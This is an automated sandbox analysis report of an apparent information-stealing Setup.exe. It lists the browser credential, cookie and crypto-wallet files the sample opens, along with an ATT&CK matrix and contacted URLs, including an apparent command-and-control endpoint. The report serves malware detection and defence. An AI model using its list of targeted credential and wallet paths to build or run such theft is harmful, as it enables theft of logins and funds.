            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\Setup.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: Yara matchFile source: 00000000.00000003.2387242749.000000000314E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6924, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6924, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            121
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Deobfuscate/Decode Files or Information
            LSASS Memory11
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol41
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            Logon Script (Windows)Logon Script (Windows)1
            Obfuscated Files or Information
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS11
            File and Directory Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Setup.exe13%ReversingLabs
            Setup.exe6%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://sturdy-operated.cyou/apiUR0%Avira URL Cloudsafe
            https://sturdy-operated.cy0%Avira URL Cloudsafe
            https://sturdy-operated.cyou/apior0%Avira URL Cloudsafe
            https://sturdy-operated.cyou/api0%Avira URL Cloudsafe
            https://sturdy-operated.cyou/apiQ0%Avira URL Cloudsafe
            https://sturdy-operated.cyou/0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            sturdy-operated.cyou
            104.21.20.178
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://sturdy-operated.cyou/apitrue
              • Avira URL Cloud: safe
              unknown
              p3ar11fter.sbsfalse
                high
                peepburry828.sbsfalse
                  high
                  p10tgrace.sbsfalse
                    high
                    processhol.sbsfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://sturdy-operated.cyou/apiorSetup.exe, 00000000.00000003.2466570367.000000000313D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2444456913.000000000313C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2468291512.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabSetup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/ac/?q=Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.Setup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://sturdy-operated.cyou/apiURSetup.exe, 00000000.00000003.2466570367.000000000313D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2468291512.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiSetup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.rootca1.amazontrust.com/rootca1.crl0Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://ocsp.rootca1.amazontrust.com0:Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://bitvise.com/versions/BvSshServer9https://bitvise.com/versions/BvSshClient9nameSetup.exefalse
                                          high
                                          https://www.ecosia.org/newtab/Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgSetup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://sturdy-operated.cyou/apiQSetup.exe, 00000000.00000002.2468096237.00000000030E2000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2466366236.00000000030E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetup.exe, 00000000.00000003.2363644953.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_Setup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ac.ecosia.org/autocomplete?q=Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgSetup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.c.lencr.org/0Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://x1.i.lencr.org/0Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSetup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://sturdy-operated.cySetup.exe, 00000000.00000003.2387242749.000000000314E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3Setup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?Setup.exe, 00000000.00000003.2362750025.0000000005C59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://sturdy-operated.cyou/Setup.exe, 00000000.00000003.2340783002.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2407580788.0000000005C2C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2444211079.0000000005C2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://support.mozilla.org/products/firefoxgro.allSetup.exe, 00000000.00000003.2363644953.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Setup.exe, 00000000.00000003.2319255162.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319335494.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2319449992.0000000005C6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.mozilla.orSetup.exe, 00000000.00000003.2363543663.0000000005C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
